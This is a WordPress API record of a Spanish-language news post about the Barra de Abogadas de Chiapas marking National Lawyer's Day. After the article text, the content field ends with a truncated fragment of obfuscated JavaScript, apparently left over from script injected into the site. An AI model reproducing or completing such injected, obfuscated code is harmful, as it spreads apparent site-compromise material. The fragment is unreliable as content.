{"id":16675,"date":"2024-07-13T03:45:58","date_gmt":"2024-07-13T03:45:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16675"},"modified":"2024-07-13T03:46:00","modified_gmt":"2024-07-13T03:46:00","slug":"barra-de-abogadas-de-chiapas-se-fortalece","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16675","title":{"rendered":"Barra de Abogadas de Chiapas se fortalece"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"685\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240712-WA0020-1-1024x685.jpg\" alt=\"\" class=\"wp-image-16676\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240712-WA0020-1-1024x685.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240712-WA0020-1-300x201.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240712-WA0020-1-768x513.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240712-WA0020-1-110x75.jpg 110w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240712-WA0020-1.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>12 de julio del 2024. San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Nacional del Abogado, la Barra de Abogadas de Chiapas (BACH) celebr\u00f3 su crecimiento y consolidaci\u00f3n como una de las organizaciones m\u00e1s representativas del estado. Con un poco m\u00e1s de 800 profesionales del derecho y de otras carreras afines son un referente en el \u00e1mbito jur\u00eddico y social de Chiapas.<\/p>\n\n\n\n<p>Eleaneth Garc\u00eda de los Santos, fundadora y presidenta de la BACH, comparti\u00f3 algunos de los logros y desaf\u00edos que han marcado la trayectoria de esta organizaci\u00f3n. &#8220;La Barra de Abogadas de Chiapas no solo ha crecido en n\u00famero, sino tambi\u00e9n en influencia y en la capacidad de incidir en temas relevantes para nuestra sociedad&#8221;.<\/p>\n\n\n\n<p>La BACH, integrada por abogadas y profesionales de diversas disciplinas, se ha destacado por su compromiso con la defensa de los derechos humanos, la promoci\u00f3n de la equidad de g\u00e9nero y la lucha contra la violencia. &#8220;Nuestro objetivo es ofrecer una plataforma donde las mujeres profesionales del derecho puedan desarrollarse plenamente y contribuir al bienestar de nuestra comunidad&#8221;, se\u00f1al\u00f3 la presidenta.<\/p>\n\n\n\n<p>Adem\u00e1s de su labor en la defensa legal, la BACH ha implementado programas de formaci\u00f3n y capacitaci\u00f3n continua para sus miembros, promoviendo as\u00ed la excelencia profesional y el liderazgo \u00e9tico. &#8220;Creemos en la importancia de estar actualizados y preparados para enfrentar los retos que se presentan en el ejercicio de nuestra profesi\u00f3n&#8221;, indic\u00f3.<\/p>\n\n\n\n<p>&#8220;Invitamos a todos los abogados y abogadas a unirse a nuestra causa y a trabajar juntos por un Chiapas m\u00e1s justo y equitativo&#8221;, concluy\u00f3 la presidenta.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 12 de julio del 2024. San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Nacional del Abogado, la Barra de Abogadas de Chiapas (BACH) celebr\u00f3 su crecimiento y consolidaci\u00f3n como una de las organizaciones m\u00e1s representativas del estado. Con un poco m\u00e1s de 800 profesionales del derecho y de otras carreras &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16676,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16675","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16675","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16675"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16675\/revisions"}],"predecessor-version":[{"id":16677,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16675\/revisions\/16677"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16676"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16675"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16675"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16675"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}